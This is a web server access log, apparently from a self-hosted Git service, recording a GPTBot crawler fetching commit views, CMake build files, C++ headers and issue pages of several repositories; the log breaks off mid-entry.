"/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19507] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:17:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13012] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12934] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12976] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13010] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16838] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:39:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:17:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build" +[17/Feb/2026:17:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles" [Client 74.7.227.38] [Length 77877] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:17:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude" [Client 74.7.227.38] [Length 51358] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:17:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fcmake_install.cmake" [Client 74.7.227.38] [Length 27350] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles" [Client 74.7.227.38] [Length 176279] [Gzip 16.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:17:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude" [Client 74.7.227.38] [Length 39856] [Gzip 8.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:17:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fMakefile" [Client 74.7.227.38] [Length 28070] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeCache.txt" [Client 74.7.227.38] [Length 28878] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:17:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeCache.txt" [Client 74.7.227.38] [Length 35213] [Gzip 8.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude" [Client 74.7.227.38] [Length 29570] [Gzip 6.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:17:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeCache.txt" [Client 74.7.227.38] [Length 34518] [Gzip 8.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:17:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles" [Client 74.7.227.38] [Length 54085] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:17:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fMakefile" [Client 74.7.227.38] [Length 29929] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11572] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:17:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fOpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 23635] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:17:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7655] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" +[17/Feb/2026:17:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8477] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=name&state=open" +[17/Feb/2026:17:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 